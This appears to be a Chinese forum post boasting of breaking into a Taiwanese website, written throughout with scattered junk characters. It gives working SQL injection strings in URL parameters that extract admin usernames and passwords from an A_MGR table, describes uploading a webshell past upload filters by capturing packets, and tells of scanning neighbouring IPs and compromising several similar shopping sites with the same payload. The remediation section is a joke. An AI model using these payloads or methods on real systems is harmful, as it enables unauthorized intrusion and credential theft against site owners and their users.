发现一个注入点
B8 Z! O, r+ R9 w! Whttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833898 ?6 {$ _1 G2 `( p. o
; j, w8 q/ I3 C' F+ _. D
习惯性的加’having1=1--
" U% d+ J# O+ r5 r: Y
) l9 ~4 W6 E, g ^, fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
7 O. B1 o' }0 I& T5 y% v% ?9 P; P9 \( K9 b5 m" m& G
0
3 j5 T$ ^4 P2 q
7 l) Z+ E# B9 l9 D4 [* ^爆出Diary_A.dl_Title(这时候很激动啊): u5 e5 P' |) \: [' K5 Y: s' \7 e* s
; j3 m3 n4 _* R) S$ q; C8 u那么继续8 ], B- u0 [2 ?. w& Q7 G
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
P% j0 ]) G S, L$ N e0 P' r7 b2 s! t+ r" I( b. U- C
继续,一直爆下去: w; ^2 r; |+ J
( X4 q5 A/ k" ~3 k) j
爆到几个字段和表段 但是没找到需要的管理用户的字段
; x1 n) t+ b3 J! |& l
+ @$ C. h8 b4 r3 G0 e6 s, Y蛋疼了 怎么办 然后去后台登陆页看源码
$ F) U' ?8 m# u9 x6 g5 f4 {% Z
0 y" R6 R0 B5 T$ M08 W4 C( D4 X! X9 O! V! I, ]- j2 ~1 B
; X9 G7 z n& l* ]Input name= “ADUID”
8 [2 v3 D; \% D/ d1 @Input name= “ADPWD”
) f. [5 \% \3 l% }& h
8 Z5 ]) w3 D; D- T很幸运 找到了字段那就继续
4 y, B: C1 F' e( ]) n找到之后开始爆用户2 O& G- X( h+ r
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
" O" F# o% [7 P. T$ f2 Q爆密码
/ ~) Q* H1 `( z6 a1 b7 l- ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—, R3 C% z9 u5 q* W: @3 y. L( g3 ?
测试了下 这个注入点只能爆到文章哪里的表
1 |+ |2 y3 N |" |& d0 u( Z: C
6 o, e1 U! ~5 H, |头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了& a, j: [7 G, Q* `; q
: h; e4 q3 [7 g; v3 C$ F
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
# N2 }% h, m" O7 T% v% Z1 P: p3 u0 @# W. ~- l* ^6 J" v
473
2 _8 F5 y0 X1 ~$ B9 h! a& K% U, d, v
进后台
* A- f; ?2 A! ^9 X$ ^% N8 `" W
+ |- H, W T, P- U4 t3 G' g
4 u% s% {% U8 c% ^/ Y2 x发现几个上传点 有的地方不能上传 而且防止恶意代码' l, A& H. E/ P" A
$ h# e+ I) P9 d% ?没办法 各种百度各种找大牛 找到一只好像可以突破的马
% u0 G+ J' g1 x" L
, F/ c/ S4 a$ {/ S$ M
/ @9 e# p6 T/ ^3 m$ f: }* P# b在系统管理那里直接上传 不过没有显示地址
. t$ [% N$ n3 Z& n) r) }0 Z! d) L7 y
2 B4 s+ X( H: R! E. r* _9 y再上传一次 抓包 搞定OK
+ o) |* H3 ]5 n' A3 E8 Q6 [6 m1 P: ` L
8 s; O) U( c2 g; a
5 z& Y5 T" k5 @7 e472
9 d8 g) u- p6 K. y# U& @$ K. |4 V! _, s. o2 \, H
晚上不行了 去睡觉。。。
1 J4 ]6 _5 D& }+ x第二天刚起床 闲的没事做继续日站吧 : ~7 H' m# }$ m i
; s# B9 S' l4 J T. w5 }, D. J
找个站 就把这个站的旁c扫了下; K0 W6 s# R( T3 U6 Y d& e6 U
; X+ C$ D, R5 r2 ]- @7 {
发现c段也有一个购物站 ,然后还和这个站的模板差不多! T3 ~% m# T5 Q: |9 v( ?
v1 T" n& H+ k6 {; D3 X: \$ F$ U# P; u就找到会员登录口测试: K9 a; s! U4 r, ?% v
+ r6 ~1 ~7 Z( B" M'and (select top 1 MGR_UID from A_MGR)>0—
8 [% Y$ B6 S7 D2 X: _果断爆到了 这时候我很激动 通杀6 U8 _7 l0 f% g+ Q+ C4 p
5 Z& h5 r0 J( X: f; O/ h4 {
再次翻c段
: n2 {! h2 d- d2 e) d9 F. \% r
* p* H1 O5 r2 F! s( ~2 @翻出几个站 都成功拿下8 {* v% g! i/ g% N
9 O8 q/ \4 X% b! i6 ^3 b* m) G
; W9 J9 B( C" |" v$ b3 V/ u/ F
修复方案:1 ~+ t, x# g4 [$ e R; [0 S
他们比我专业
- H+ e+ W- I, F) n0 z- k8 I: t7 A/ {3 s- o
% u3 r/ [/ z6 N% g
! q0 _7 h6 ]9 E
|